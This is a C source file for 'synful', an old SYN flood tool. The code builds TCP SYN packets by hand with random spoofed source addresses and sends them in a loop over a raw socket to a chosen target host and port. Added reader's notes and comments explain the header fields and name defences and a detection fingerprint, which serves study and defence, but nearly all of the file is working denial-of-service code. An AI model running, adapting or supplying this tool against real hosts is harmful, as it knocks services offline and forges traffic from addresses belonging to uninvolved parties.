📄 synful.c
/* synful.c - SYN (SYN/ACK and ACK blow) written by \\StOrM\\ */
/*
 * Reader's notes.
 *
 * What the code does: on every loop iteration it draws a random source IPv4
 * address and port, hand-builds a 40-byte IP+TCP datagram with only the SYN
 * flag set, and sends it through a raw socket to one destination address and
 * port. Nothing is ever read back, so each datagram asks the receiver to
 * begin a handshake that this program never completes.
 *
 * What the traffic looks like (all taken from the field assignments in
 * dosynpacket): TTL 255, TCP window 512, data offset 5 (no TCP options),
 * IP total length 40, and the IP ID, TCP source port and TCP sequence number
 * all derived from the same 16-bit value. Each source octet is drawn from
 * 1..255, so a share of the source addresses fall in loopback, private,
 * multicast and reserved ranges.
 *
 * Defensive relevance: SYN cookies and listen-backlog tuning on the receiver,
 * source-address validation (BCP 38 / uRPF) at the network edge, and bogon
 * filtering are the usual controls for this traffic pattern. The correlated
 * header fields listed above are usable as a detection fingerprint. Opening
 * the raw socket requires privilege on the sending host (CAP_NET_RAW on
 * Linux).
 */
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <arpa/inet.h>
#include <linux/ip.h>
#include <linux/tcp.h>

/* Builds and sends one datagram: (source addr, dest addr, dest port, random 16-bit value). */
void dosynpacket(unsigned int, unsigned int, unsigned short, unsigned short);
/* Internet checksum over nbytes bytes starting at ptr. */
unsigned short in_cksum(unsigned short *, int);
/* Dotted-quad or hostname string to an IPv4 address as stored in in_addr.s_addr. */
unsigned int host2ip(char *);

/*
 * Entry point.
 *   argv[1]  destination address or hostname (required)
 *   argv[2]  destination port, read with atoi; 0 or absent falls back to 80
 *   argv[3]  iteration count, read with atoi; 0 or absent falls back to 1000
 * The usage string only mentions the first argument, but the other two are
 * read when present.
 */
main(int argc, char **argv){
    unsigned int srchost;
    char tmpsrchost[12];
    int i,s1,s2,s3,s4;
    unsigned int dsthost;
    unsigned short port=80;
    unsigned short random_port;
    unsigned int number=1000;

    printf("synful [It's so synful to send those spoofed SYN's]\n");
    printf("Hacked out by \\\\StOrM\\\\\n\n");

    if(argc < 2) {
        printf("syntax: synful targetIP\n", argv[0]);
        exit(0);
    }

    /* Seed rand() from the clock before any random value is drawn. */
    initrand();
    /* The destination is resolved once, outside the loop. */
    dsthost = host2ip(argv[1]);
    if(argc >= 3) port = atoi(argv[2]);
    if(argc >= 4) number = atoi(argv[3]);
    if(port == 0) port = 80;
    if(number == 0) number = 1000;

    printf("Destination : %s\n",argv[1]);
    printf("Port : %u\n",port);
    printf("NumberOfTimes: %d\n\n", number);

    for(i=0;i < number;i++) {
        /* Each octet is uniform over 1..255, so no octet of the source is ever 0. */
        s1 = 1+(int) (255.0*rand()/(RAND_MAX+1.0));
        s2 = 1+(int) (255.0*rand()/(RAND_MAX+1.0));
        s3 = 1+(int) (255.0*rand()/(RAND_MAX+1.0));
        s4 = 1+(int) (255.0*rand()/(RAND_MAX+1.0));
        /* 1..10000; this single value later feeds the IP ID, TCP source port and sequence number. */
        random_port = 1+(int) (10000.0*rand()/(RAND_MAX+1.0));
        sprintf(tmpsrchost,"%d.%d.%d.%d",s1,s2,s3,s4);
        printf("Being Synful to %s at port %u from %s port %u\n", argv[1], port, tmpsrchost, random_port);
        /* The random dotted quad goes back through host2ip to obtain its numeric form. */
        srchost = host2ip(tmpsrchost);
        dosynpacket(srchost, dsthost, port, random_port);
    }
}

/*
 * Build one IPv4 + TCP header pair by hand and send it on a raw socket.
 *
 *   source_addr  value written to the IP source field (as returned by host2ip)
 *   dest_addr    value written to the IP destination field and the sockaddr
 *   dest_port    destination port in host order; converted with htons here
 *   ran_port     16-bit value reused for IP ID, TCP source port and sequence
 *
 * A socket is opened and closed on every call. The process exits with
 * status 1 if the socket cannot be opened; the result of sendto is ignored.
 */
void dosynpacket(unsigned int source_addr, unsigned int dest_addr, unsigned short dest_port, unsigned short ran_port) {
    /* IP header immediately followed by TCP header: 20 + 20 = 40 bytes, sent as one buffer. */
    struct send_tcp {
        struct iphdr ip;
        struct tcphdr tcp;
    } send_tcp;
    /* TCP checksum input: 12 bytes of pseudo-header followed by a copy of the 20-byte TCP header. */
    struct pseudo_header {
        unsigned int source_address;
        unsigned int dest_address;
        unsigned char placeholder;
        unsigned char protocol;
        unsigned short tcp_length;
        struct tcphdr tcp;
    } pseudo_header;
    int tcp_socket;
    struct
    sockaddr_in sin;
    int sinlen;

    /* form ip packet */
    send_tcp.ip.ihl = 5;                 /* 5 x 32-bit words = 20-byte header, no IP options */
    send_tcp.ip.version = 4;
    send_tcp.ip.tos = 0;
    send_tcp.ip.tot_len = htons(40);     /* headers only, no payload */
    send_tcp.ip.id = ran_port;           /* no byte-order conversion applied */
    send_tcp.ip.frag_off = 0;
    send_tcp.ip.ttl = 255;               /* constant on every datagram this code sends */
    send_tcp.ip.protocol = IPPROTO_TCP;
    send_tcp.ip.check = 0;
    send_tcp.ip.saddr = source_addr;     /* the randomly generated address from main */
    send_tcp.ip.daddr = dest_addr;

    /* form tcp packet */
    send_tcp.tcp.source = ran_port;      /* stored without htons, unlike dest below */
    send_tcp.tcp.dest = htons(dest_port);
    send_tcp.tcp.seq = ran_port;         /* same value as ip.id and tcp.source */
    send_tcp.tcp.ack_seq = 0;
    send_tcp.tcp.res1 = 0;
    send_tcp.tcp.doff = 5;               /* 20-byte TCP header: no options are carried */
    send_tcp.tcp.fin = 0;
    send_tcp.tcp.syn = 1;                /* SYN is the only flag set */
    send_tcp.tcp.rst = 0;
    send_tcp.tcp.psh = 0;
    send_tcp.tcp.ack = 0;
    send_tcp.tcp.urg = 0;
    send_tcp.tcp.res2 = 0;
    send_tcp.tcp.window = htons(512);    /* constant on every datagram this code sends */
    send_tcp.tcp.check = 0;
    send_tcp.tcp.urg_ptr = 0;

    /* setup the sin struct */
    sin.sin_family = AF_INET;
    sin.sin_port = send_tcp.tcp.source;  /* filled from the TCP source field, not from dest_port */
    sin.sin_addr.s_addr = send_tcp.ip.daddr;

    /* (try to) open the socket */
    /* A SOCK_RAW socket needs privilege on the sender (CAP_NET_RAW on Linux). */
    tcp_socket = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if(tcp_socket < 0) {
        perror("socket");
        exit(1);
    }

    /* set fields that need to be changed */
    /* All three counters advance together, so they stay equal in value after this step. */
    send_tcp.tcp.source++;
    send_tcp.ip.id++;
    send_tcp.tcp.seq++;
    send_tcp.tcp.check = 0;
    send_tcp.ip.check = 0;

    /* calculate the ip checksum */
    send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);

    /* set the pseudo header fields */
    pseudo_header.source_address = send_tcp.ip.saddr;
    pseudo_header.dest_address = send_tcp.ip.daddr;
    pseudo_header.placeholder = 0;
    pseudo_header.protocol = IPPROTO_TCP;
    pseudo_header.tcp_length = htons(20);
    /* Copy the TCP header (checksum field still 0) behind the pseudo-header, then sum all 32 bytes. */
    bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
    send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32);

    sinlen = sizeof(sin);
    /* The return value is not examined, so a failed send goes unreported. */
    sendto(tcp_socket, &send_tcp, 40, 0, (struct sockaddr *)&sin, sinlen);
    close(tcp_socket);
}

/*
 * Internet checksum: ones-complement of the ones-complement sum of the
 * 16-bit words in [ptr, ptr + nbytes). Returns the 16-bit result.
 * The callers in this file pass 20 and 32 bytes, so the accumulator stays
 * far below 32 bits.
 */
unsigned short in_cksum(unsigned short *ptr, int nbytes){
    register long sum;          /* assumes long == 32 bits */
    u_short oddbyte;
    register u_short answer;    /* assumes u_short == 16 bits */

    /*
     * Our algorithm is simple, using a
     * 32-bit accumulator (sum),
     * we add sequential 16-bit words to it, and at the end, fold back
     * all the carry bits from the top 16 bits into the lower 16 bits.
     */
    sum = 0;
    while (nbytes > 1) {
        sum += *ptr++;
        nbytes -= 2;
    }

    /* mop up an odd byte, if necessary */
    if (nbytes == 1) {
        oddbyte = 0;            /* make sure top half is zero */
        *((u_char *) &oddbyte) = *(u_char *)ptr;    /* one byte only */
        sum += oddbyte;
    }

    /*
     * Add back carry outs from top 16 bits to low 16 bits.
     */
    sum = (sum >> 16) + (sum & 0xffff);    /* add high-16 to low-16 */
    sum += (sum >> 16);                    /* add carry */
    answer = ~sum;    /* ones-complement, then truncate to 16 bits */
    return(answer);
}

/*
 * Convert a dotted-quad string or a hostname to the value stored in
 * in_addr.s_addr. inet_addr is tried first; if it returns -1 the name is
 * looked up with gethostbyname. On lookup failure a message is written to
 * stderr and the process exits with status 0.
 * The result lives in a static in_addr, so the function keeps state between
 * calls. The -1 test also matches the string "255.255.255.255", which then
 * goes down the gethostbyname path.
 */
unsigned int host2ip(char *hostname){
    static struct in_addr i;
    struct hostent *h;

    i.s_addr = inet_addr(hostname);
    if(i.s_addr == -1) {
        h = gethostbyname(hostname);
        if(h == NULL) {
            fprintf(stderr, "cant find %s!\n", hostname);
            exit(0);
        }
        /* Copies h_length bytes from the first address of the lookup result. */
        bcopy(h->h_addr, (char *)&i.s_addr, h->h_length);
    }
    return i.s_addr;
}

/*
 * Seed rand() with the microsecond field of the current time of day.
 * Only tv_usec is used, so the seed comes from a range of one million values.
 */
void initrand(void){
    struct timeval tv;

    gettimeofday(&tv, (struct timezone *) NULL);
    srand(tv.tv_usec);
}